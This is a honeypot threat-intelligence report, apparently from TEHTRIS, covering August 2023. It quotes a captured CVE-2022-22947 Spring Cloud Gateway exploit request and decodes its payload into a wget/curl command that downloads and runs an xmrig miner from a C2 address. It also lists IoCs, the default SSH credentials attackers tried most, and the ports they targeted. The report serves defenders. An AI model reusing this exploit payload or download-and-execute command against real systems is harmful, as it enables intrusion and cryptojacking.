TEHTRIS believes in creating cyber threat intelligence based on empiric observations of what is happening in the cyberworld. To do so, we deployed a large network of honeypots – equipped with TEHTRIS solutions, and our team analyses logs collected in the XDR Platform.
Keeping track of trends and keeping an eye on what is actively scanned by threat actors in a reconnaissance phase allows to adjust the cybersecurity posture and detect low signals for further malicious activities.
Check out our previous report here.
CVE-2022-22947 EXPLOIT ATTEMPTS
We have observed CVE-2022-22947 (CVSSv3: 10) exploit attempts on our honeypots network. This CVE affects Spring Cloud Gateway applications, which are vulnerable to code injection when the Gateway Actuator endpoint is enabled, exposed and unsecured.
On the 26th and the 27th of August, the US IP address 185.207.250[.]115, hosted by AS51167 (Contabo GmbH) and known from public databases for being malicious, targeted our honeypots on port TCP/80. The devices affected are European honeypots hosted in the following countries: Spain, France, Estonia, Netherlands, Czech Republic, Finland, Portugal, Belgium, Ireland, Italy, and Poland.
Here is an example of the corresponding URL captured by our honeypot:
POST /actuator/gateway/routes/AzMtdFlkrml HTTP/1.1
User-Agent: Custom-HttpClient { "id": "AzMtdFlkrml", "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String(java.util.Base64.getDecoder().decode(\"cGtpbGwgLTkgLmZveG07IGNkIC90bXA7IHdnZXQgaHR0cDovLzE4NS4yMjUuNzUuMjQyL2Rvd25sb2FkL3htcmlnLng4Nl82NDsgY3VybCAtTyBodHRwOi8vMTg1LjIyNS43NS4yNDIvZG93bmxvYWQveG1yaWcueDg2XzY0OyBtdiB4bXJpZy54ODZfNjQgLmZveG07IGNobW9kICt4IC5mb3htOyAuLy5mb3ht\"))).getInputStream()))}" } }], "uri": "http://example.com" }
This request exploits CVE-2022-22947 and execute a base64 encoded command on the victim.
The decoded command downloads an Xmrig cryptocurrency miner and executes it :
pkill -9 .foxm; cd /tmp; wget http[:]//185.225.75[.]242/download/xmrig.x86_64; curl -O http[:]//185.225.75[.]242/download/xmrig.x86_64; mv xmrig.x86_64 .foxm; chmod +x .foxm; ./.foxm
This C2 (command & control) Dutch IP address 185.225.75[.]242 is hosted by AS211252 Delis LLC and known from VirusTotal community as it is referred for SSH credential attacks and linked to a miner.
IoCs
- 185.207.250[.]115
- 185.225.75[.]242
SSH services targeted – August trends
For the month of August 2023, we have observed the following trends regarding malicious activities targeting SSH services on our worldwide honeypots network.
Top 10 credentials tested by threat actors:
Login | Password |
345gs5662d34 | 345gs5662d34 |
admin | admin |
0 | 0 |
ubnt | ubnt |
root | password |
root | root |
admin | admin123 |
factory | factory |
3comcso | RIP000 |
cameras | cameras |
Top 10 of the most malicious IP addresses (all known from public databases):
- 193.105.134[.]95
- 185.246.128[.]133
- 218.92.0[.]119
- 218.92.0[.]120
- 218.92.0[.]123
- 185.224.128[.]141
- 185.224.128[.]142
- 180.101.88[.]234
- 180.101.88[.]249
- 180.101.88[.]223
Top ports/protocols targeted by threat actors – August 2023
Protocol | Port | % |
TCP | 445 | 18.833% |
TCP | 22 | 12.43% |
TCP | 80 | 6.273% |
TCP | 23 | 5.598% |
TCP | 6379 | 1.546% |
TCP | 443 | 1.22% |
UDP | 12522 | 1.166% |
TCP | 3389 | 0.964% |
UDP | 5060 | 0.641% |
TCP | 8443 | 0.508% |